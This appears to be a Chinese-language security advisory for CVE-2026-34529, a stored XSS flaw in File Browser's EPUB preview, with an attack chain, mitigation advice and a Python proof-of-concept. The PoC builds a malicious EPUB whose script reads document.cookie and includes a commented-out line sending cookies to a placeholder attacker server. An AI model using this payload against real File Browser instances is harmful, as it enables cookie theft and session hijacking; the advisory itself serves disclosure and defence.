IPBUF安全漏洞报告
English
CVE-2026-34529 CVSS 7.6 高危

CVE-2026-34529 File Browser存储型XSS漏洞

披露日期: 2026-04-01
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34529
漏洞类型
存储型跨站脚本攻击 (XSS)
CVSS评分
7.6 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
File Browser

相关标签

XSS存储型XSSFile BrowserEPUBCVE-2026-34529Web安全

漏洞概述

File Browser是一款文件管理工具。在2.62.2版本之前,其EPUB文件预览功能存在存储型跨站脚本(XSS)漏洞。攻击者可以上传包含恶意JavaScript代码的特制EPUB文件。当受害者预览该文件时,恶意代码将在其浏览器中执行,可能导致敏感信息泄露或会话劫持。该问题已在v2.62.2版本中修复。

技术细节

该漏洞属于存储型跨站脚本攻击(Stored XSS)。File Browser的EPUB预览功能在处理用户上传的EPUB文件时,未对文件内容进行充分的过滤或转义。EPUB文件实际上基于HTML和XML格式,攻击者可以在EPUB文件的内部结构中嵌入恶意的JavaScript代码。由于应用程序信任用户上传的内容并在预览时直接渲染,当拥有低权限的攻击者上传了恶意EPUB文件后,诱导具有高权限的受害者(如管理员)点击预览该文件,嵌入的JavaScript代码将在受害者的浏览器上下文中运行。这利用了CVSS向量中的S:C(范围改变),攻击者可借此窃取Cookie、会话令牌或执行其他客户端操作。

攻击链分析

STEP 1
1. 制作恶意文件
攻击者创建一个特制的EPUB电子书文件,在文件的HTML内容中嵌入恶意的JavaScript代码。
STEP 2
2. 上传文件
攻击者使用低权限账户登录File Browser,并将包含恶意代码的EPUB文件上传到服务器。
STEP 3
3. 诱导预览
攻击者诱导具有高权限(如管理员)的受害者点击并预览该EPUB文件。
STEP 4
4. 执行攻击
File Browser渲染EPUB内容时,未过滤的JavaScript代码在受害者的浏览器中执行,导致Cookie窃取或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # Proof of Concept (PoC) generator for CVE-2026-34529 # This script creates a malicious EPUB file containing XSS payload. import zipfile import os def create_malicious_epub(filename='malicious.epub'): # Create a temporary directory structure for the EPUB os.makedirs('OEBPS', exist_ok=True) # 1. Create the mimetype file (must be uncompressed) with open('mimetype', 'w') as f: f.write('application/epub+zip') # 2. Create container.xml os.makedirs('META-INF', exist_ok=True) with open('META-INF/container.xml', 'w') as f: f.write('''<?xml version="1.0"?> <container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container"> <rootfiles> <rootfile full-path="OEBPS/content.xhtml" media-type="application/xhtml+xml"/> </rootfiles> </container>''') # 3. Create the malicious XHTML content # The JavaScript payload executes when the file is previewed xss_payload = '''<html xmlns="http://www.w3.org/1999/xhtml"> <head><title>XSS PoC</title></head> <body> <h1>Normal EPUB Content</h1> <script> // Malicious code execution alert('CVE-2026-34529 Exploited!'); console.log('Cookie: ' + document.cookie); // fetch('http://attacker-server/?c=' + document.cookie); </script> </body> </html>''' with open('OEBPS/content.xhtml', 'w') as f: f.write(xss_payload) # 4. Zip everything into an EPUB file with zipfile.ZipFile(filename, 'w') as zf: zf.write('mimetype', compress_type=zipfile.ZIP_STORED) zf.write('META-INF/container.xml') zf.write('OEBPS/content.xhtml') print(f"[+] Malicious EPUB file created: {filename}") print("[+] Upload this file to File Browser and preview it to trigger the XSS.") # Cleanup os.remove('mimetype') os.remove('META-INF/container.xml') os.remove('OEBPS/content.xhtml') os.rmdir('OEBPS') os.rmdir('META-INF') if __name__ == "__main__": create_malicious_epub()

影响范围

File Browser < 2.62.2

防御指南

临时缓解措施
建议立即将File Browser更新到v2.62.2版本以彻底修复此漏洞。如果无法立即升级,应临时禁用EPUB文件的在线预览功能,或者阻止上传EPUB格式的文件,直到完成更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表